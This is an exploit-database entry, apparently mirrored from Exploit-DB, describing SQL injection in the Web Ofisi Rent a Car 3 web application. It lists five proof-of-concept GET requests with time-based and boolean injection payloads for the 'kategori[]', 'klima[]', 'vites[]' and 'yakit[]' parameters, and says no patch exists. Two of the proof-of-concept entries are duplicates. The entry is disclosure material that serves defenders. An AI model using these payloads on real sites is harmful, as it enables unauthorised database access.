header-logo
Suggest Exploit
vendor:
Web Ofisi Rent a Car 3
by:
Ahmet Ümit BAYRAM
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Web Ofisi Rent a Car 3
Affected Version From: v3
Affected Version To: v3
Patch Exists: NO
Related CWE:
CPE: a:web_ofisi:rent_a_car_v3
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2019

Web Ofisi Rent a Car 3 – ‘klima’ SQL Injection

The Web Ofisi Rent a Car 3 application is vulnerable to SQL Injection. Multiple parameters in the URL are vulnerable to SQL Injection attacks, including 'kategori[]', 'klima[]', 'vites[]', and 'yakit[]'. An attacker can exploit these vulnerabilities to execute arbitrary SQL commands on the underlying database.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. Additionally, the use of prepared statements and stored procedures can help protect against SQL Injection.
Source

Exploit-DB raw data:

# Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html
# Demo Site: http://demobul.net/rentacarv3/
# Version: v3
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: kategori[] (GET)
Payload: if(now()=sysdate(),sleep(0),0)

----- PoC 2: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: klima[] (GET)
Payload: 1 AND 3*2*1=6 AND 695=695

----- PoC 3: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: vites[] (GET)
Payload: 1 AND 3*2*1=6 AND 499=499

----- PoC 4: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: vites[] (GET)
Payload: 1 AND 3*2*1=6 AND 499=499

----- PoC 5: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: yakit[] (GET)
Payload: 1 AND 3*2*1=6 AND 602=602

Navigation

Suggest Exploit

Services By CQR